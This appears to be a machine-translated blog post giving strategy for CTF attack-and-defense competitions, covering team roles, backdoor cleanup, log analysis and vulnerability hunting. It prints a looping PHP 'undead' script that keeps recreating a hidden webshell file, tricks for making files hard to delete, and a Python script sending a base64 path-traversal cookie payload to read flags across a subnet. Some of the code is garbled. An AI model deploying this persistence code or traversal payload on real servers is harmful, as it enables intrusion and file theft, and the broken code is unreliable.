8 "/ >

Posted by millikan at 2020-02-29

Reading: 2485

CTF offline offensive and defensive games are mainly presented in attack & defense mode. Generally, in this mode, a team has three members, and all teams will have the same initial environment, including several servers. Teams in the competition exploit loopholes and score by attacking the opponent's servers to obtain flags, so as to repair the loopholes of their own servers and prevent points from being deducted.

brief introduction

CTF offline offensive and defensive games are mainly presented in attack & defense mode. Generally, in this mode, a team has three members, and all teams will have the same initial environment, including several servers. Teams in the competition exploit loopholes and score by attacking the opponent's servers to obtain flags, so as to repair the loopholes of their own servers and prevent points from being deducted.

Attack and defense mode can reflect the competition situation through real-time scoring. It is a highly competitive, highly ornamental and transparent network security competition system. In this competition system, not only the intelligence and technology of the players, but also the division of labor, cooperation and cooperation between teams.

Topic types

1. Common language loopholes

Python template injection (SSTI): directly use the vulnerability to execute the command to obtain the flag and bypass the keyword restrictions.

Read any file in nodejs: read the flag directly.

Various PHP vulnerabilities: File Inclusion, deserialization, file upload, injection, code execution, command execution.

2. Back door vulnerability

3. Open CMS vulnerabilities

DZ SSRF vulnerability, niche CMS 0day, CMS modified / written by the author.

Game topology (see Figure 1)

Figure 1 competition topology

Overall idea (see Figure 2)

Figure 2 overall idea


Usually there will be three players in the off-line offensive and defensive games, and how to divide the three players reasonably is the work that needs to be done before the game starts.

In the off-line attack and defense competition, two team members are generally needed as attackers to conduct vulnerability mining, permission maintenance, network exploration, vulnerability utilization, automatic attack, automatic submission, etc. One of the two team members should have a strong ability to write code. Its main function is to build script programs that can be submitted in batch and attacked automatically in a short time, so as to avoid wasting manpower on submitting flag. Another member acts as a protector for bug repair, backdoor troubleshooting, file monitoring, weak password troubleshooting, etc.


In any competitive attack and defense competition, protection is a very important part. CTF offline attack and defense is no exception, often in the final ranking of the game are the top few teams that have taken protective measures against the server.

In general, protection is divided into vulnerability repair, file backup, back door troubleshooting, file monitoring, weak password troubleshooting, etc.

Vulnerability repair is to filter and repair the corresponding code after the attacker's role finds the point that can be attacked.

File backup means that the original data must be backed up at the beginning of the game, so as to prevent the server related web files from being deleted and the service can be restored automatically after it is down (generally, the score will be deducted continuously when the online game service is down, and a large number of scores will be deducted when the service is restarted).

The back door investigation can be divided into two situations: the first is the hidden back door left by the main organizer in order to take care of the lower level players, and the second is the back door left by other teams after obtaining certain permissions from the server through loopholes. In the first case, you can start the game by reviewing the backup files in the backdoor screening tool (such as d-shield and hippo), find the backdoor left by the sponsor, and delete it (see Figure 3).

Figure 3 webshell review

But it is also possible that the sponsor left a horse free. In this case, if there is an external network, you can download the source code and diff the official source code and the competition source code once. This method can basically find out the webshell left by all the sponsors. This method can also be used to help attackers exploit vulnerabilities, because if the vulnerability is not known to be public, the organizers will make changes in the source code to achieve the purpose of getshell. In the second case, it depends on the type of back door left by the attacker. If it's an ordinary webshell or a variant of a Trojan horse, you can delete it directly. If the horse is immortal + memory horse, it will be more troublesome, because the online attack and defense game is generally not root permission, so there is no permission to kill the process. Generally, the immortal horse creates webshell files by looping. If it doesn't kill the process, it will be created all the time, but there will be a delay. You can write a script of violent looping deletion through this delay to achieve the purpose of deletion.

Here is a common undead horse.

<? PHP




While (1) {

    file_put_contents('.config.php', '<?php phpinfo();?>');

    system('chmod 777 .config.php');

    touch(".config.php", mktime(20,15,1,11,17,2017));

Usleep (100);

> >

File monitoring is to have an alarm or block operation against any file created by the attacker on the server, to keep the file of the server from being deleted, and not allow to upload or create files. There are corresponding scripts for file monitoring on the Internet, which can be referred to for learning.

Weak password checking means that the server given by the sponsor is weak password, or there is weak password in the web service of its own server. In this case, it is necessary to change the weak password in time and do a good job in weak password checking.

Log analysis

In the offline attack and defense mode, log analysis is a very important part. Generally, log analysis is to analyze the traffic of other attackers after the official start of the game and extract useful information. By checking the traffic from other teams, we can analyze the webshell file name, vulnerability utilization and vulnerability generation points left by them, so as to facilitate our own attack. Because the organizer may not allow the contestants to view the log files, and the log files will not analyze and print the post data, we must prepare our own monitoring scripts in advance to monitor and analyze the web services when we conduct log monitoring and traffic analysis, so that we can capture the traffic from other teams and facilitate our own review.

Vulnerability mining

In CTF attack and defense competition, PHP is the most popular language, and the main types of vulnerabilities are backdoor vulnerabilities, injection types, file upload, file inclusion, code execution, command execution or known CMS vulnerabilities that have been exposed on the Internet. Therefore, in the competition, loopholes mining is mainly based on these loopholes.

In the phase of vulnerability mining, first use d-shield to kill the backup source code, filter out the Trojan files scanned by d-shield, and then delete them on the server. For other types of vulnerabilities, it is mainly through the white box and black box way for vulnerability mining. The way of black box is similar to that of penetration test. In white box test, the tool used by the author is "sea source code audit system". According to the vulnerability description listed in the tool, try to find the above vulnerability types (see Figure 4).

Figure 4 vulnerability mining

For competitions supported by different manufacturers, there are different ways to obtain flags. In my experience, I have met two ways to obtain the flag: one is that the flag is in a directory of the system; the other is to use the host of getshell to access the flag machine, and there will be the flag in the return package. For two different modes of obtaining flag mechanism, the focus of vulnerability mining is also different. For example, the former method only needs to include the flag path for File Inclusion Vulnerability, but for the latter method, it needs to determine whether there is remote inclusion or whether the pseudo protocol is available.

Permissions maintenance

1. Generate hidden files beginning with ".".

<? PHP

file_put_contents('.config.php', '<?php phpinfo();?>');    

> >

2. Generate files starting with "-".

-If RM is used to delete the first file directly, it cannot be deleted, because RM command will execute the string after - as a parameter.

[email protected]:~/test# echo "123" > -test.php

[email protected]:~/test# rm -test.php

rm: invalid option -- 't'

Try 'rm ./-test.php' to remove the file '-test.php'.

Try 'rm --help' for more information.

[email protected]:~/test#

3. Use the undead horse.

<? PHP




While (1) {

    file_put_contents('.config.php', '<?php phpinfo();?>');

    system('chmod 777 .config.php');

    touch(".config.php", mktime(20,15,1,11,17,2017));

Usleep (100);

> >

The meaning of the above code is: first of all, the code setting program executes permanently until the end of the program, and the PHP code can still be executed after the client is shut down, which can keep the PHP process executing all the time. Then delete yourself and enter the loop to generate Trojan files. Since the source Trojan horse has been deleted and injected into memory for execution, if you want to stop the program, you can only restart the service, or find out the process of the program and then kill it.

You can also use the immortal horse to generate the Trojan horse file starting with "-".

Automated attack

The embodiment of automatic attack in CTF offline attack and defense game is the process of automatically hitting payload to get the flag and then automatically submitting it.

I take a recent competition as an example. The length of the game was three hours, with the first two hours being a five minute round and the last hour being a two and a half minute round. Therefore, in such a short period of time, when you know how to attack and obtain flags, you can manually obtain flags and submit them. In a short period of 2.5 minutes, you can only submit about 4 teams' flags, which is obviously not an elegant way. In that game, the most impressive vulnerability is the arbitrary file reading vulnerability in the image loading place after the user registers and logs in. This vulnerability is not difficult, but in order to successfully exploit this vulnerability, you must first register, then use the registered account to log in, and then use the login status to visit the vulnerability page to use payload to obtain the flag. Here is the author's code:




































Get Flag

def regist_login_getFlag(url):

Data = {




cookie = {"Picture":"YToxOntzOjI6ImFhIjtzOjI4OiIuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9mbGFnIjt9"}

r = requests.Session()

url1 = url + "/index.php/register"

url2 = url + "/index.php/login"

url3 = url + "/index.php/picture"

r1 =,data = data)

r2 =,data = data)

r3 = r.get(url3,cookies =cookie)

str_result = r3.text

match = re.compile("<img src=\"data:image/jpg;base64,(.*?)\" >")


result_strs_list = re.findall(match,str_result)

print str(result_strs_list)

result_strs = result_strs_list[0]

Flag = base64.b64decode(result_strs)

Return Flag


Return 0

Submitted to Flag

def post_Flag(Flag):

url = ""

Flag = str(Flag).replace("\n","")

data = {"token":"QhfFGd6AVAucAW4kHXBDydUnqSVQcXAUbrjduxCAmwmMCBJfwUU4ZtQYE746qeNKnKEDGEYdF62","Flag":Flag},data,timeout=1)

print res.text

if __name__ == '__main__':

for x in xrange(1,32):

urls = "http://172.16."+str(x)+".101/"



The following points must be mastered in the offline attack and defense mode.

1. Use of browser.

Most of the loopholes are available online, so a good search technique is very important.

2. Ability to respond to vulnerabilities.

Getshell is generally required in attack and defense mode, so pay more attention to the points that can rce.

3. Script writing ability.

Get the flag after getshell. If there are 50 teams and refresh the flag once every 5 minutes, a team member can only submit the flag through manual submission, and it may also be down. So if there is a person who can write the script quickly, it's better.

4. Good attitude.

Don't panic when the service is down, and don't let the mentality collapse. Nothing will happen if it collapses.